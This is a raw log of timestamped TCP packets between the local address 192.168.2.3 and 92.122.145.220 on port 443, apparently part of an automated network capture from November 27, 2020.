Nov 27, 2020 14:24:56.237324953 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.237360001 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.238873959 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.238997936 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.251720905 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.270035982 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.292738914 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.292772055 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.292912006 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.292973042 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.293242931 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.293261051 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.293311119 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.293337107 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.294831038 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.294851065 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.294960022 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.296456099 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.296471119 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.296545029 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.302294016 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.302325964 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.302341938 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.302449942 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.302498102 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.527513027 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.545347929 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.556152105 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.556238890 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.556292057 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.556345940 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.556396008 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.565465927 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.584979057 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.585036039 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.585073948 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.585114956 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.585160017 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.585213900 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.586374044 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.586417913 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.586467028 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.586535931 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.587973118 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.588026047 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.588068962 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.588093042 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.589582920 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.589624882 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.589658976 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.589684963 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.593682051 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593734980 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593772888 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593837023 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.593871117 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.593873978 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593923092 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593940973 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.593966961 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.593977928 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594006062 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594018936 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594047070 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594058990 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594088078 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594099998 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594120979 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594140053 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594173908 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594399929 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594439983 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.594476938 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.594506979 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.596003056 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.596100092 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.602402925 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.625284910 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.639445066 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639503956 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639543056 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639655113 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.639687061 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.639703035 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639744997 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639774084 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.639785051 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.639802933 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.639833927 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.640557051 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.640599966 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.640630007 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.640636921 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.640652895 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.640681982 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.641366959 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.641437054 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.641458988 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.641477108 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.641491890 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.641521931 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.642189980 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.642225981 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.642270088 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.642292023 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.644663095 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.664307117 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.664369106 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.664714098 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.664956093 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.665008068 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.665072918 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.665148020 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.666572094 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.666620970 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.666697025 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.666766882 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.668168068 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.668216944 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.668277025 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.668340921 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.669756889 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.669800043 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.669862986 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.669925928 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.671366930 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.671416044 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.671487093 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.671560049 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.673001051 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.673043013 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.673110008 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.673147917 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.674566984 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.674599886 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.674645901 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.674685955 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.675328016 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676037073 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676085949 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676127911 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676129103 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.676160097 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.676183939 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.676246881 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676291943 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676328897 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.676330090 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.676363945 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.676395893 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.677437067 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.677479029 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.677530050 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.677556038 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.678795099 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.678843021 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.678883076 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.678920031 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.680171013 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.680237055 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.680253029 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.680291891 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.681557894 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.681627035 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.681637049 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.681679964 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.682924986 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.682975054 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.683007002 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.683044910 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.684273958 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.684345961 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.684366941 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.684441090 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.685647011 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.685708046 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.685764074 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.687000036 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.687053919 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.687079906 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.707101107 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.707159042 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.707293034 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.707665920 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.707705021 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.707721949 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.707745075 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.707770109 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.709038973 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.709093094 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.709125042 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.709148884 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.710432053 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.710475922 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.710555077 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.711752892 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.711800098 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.711874008 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.711899996 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.711904049 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.713155031 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.713202953 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.713278055 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.713320017 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.714453936 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.714493036 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.714543104 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.714567900 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.715814114 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.715852022 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.715897083 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.715924978 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.717211008 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.717258930 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.717299938 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.717324018 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.718594074 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.718636036 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.718691111 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.718715906 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.719904900 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.719948053 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.719980001 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.719995975 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.721285105 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.721326113 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.721364975 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.721384048 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.722651958 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.722692013 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.722780943 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.724016905 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.724049091 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.724122047 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.724143028 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.725415945 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.725450993 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.725513935 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.725594997 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.726771116 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.726804018 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.726876974 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.728136063 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.728167057 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.728230000 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.728271961 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.729496956 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.729528904 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.729564905 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.729609966 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.730853081 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.730885029 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.730973005 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.730995893 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.738027096 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.738058090 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.738169909 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.738512039 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.738533974 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.738564968 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.738614082 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.739330053 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.739541054 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.739588022 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.739622116 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.739645958 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.740540028 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.740561962 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.740624905 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.740648985 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.741482973 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.741504908 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.741583109 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.741617918 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.742410898 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.742443085 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.742489100 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.742511988 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.743386030 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.743408918 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.743489981 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.744417906 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.744468927 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.744523048 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.744554996 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.745331049 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.745347023 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.745423079 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.745871067 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.745888948 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.745935917 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.745956898 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.745985031 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.746870995 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.746891022 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.746948957 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.746972084 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.747821093 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.747844934 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.747924089 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.748774052 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.748864889 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.955275059 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.986145973 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.989415884 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.989445925 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.989450932 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:56.989562988 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:56.989598036 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.040000916 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.040057898 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.040245056 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.040616035 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.040685892 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.040724039 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.040764093 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.042256117 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.042298079 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.042347908 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.042388916 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.043838978 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.043884993 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.043935061 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.043948889 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.045459032 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.045552969 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.076005936 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.093642950 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.110546112 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.114557981 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.114597082 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.114710093 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.115334034 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.115360975 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.115449905 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.116949081 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.116978884 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.117044926 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.118562937 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.118588924 CET	443	49702	92.122.145.220	192.168.2.3
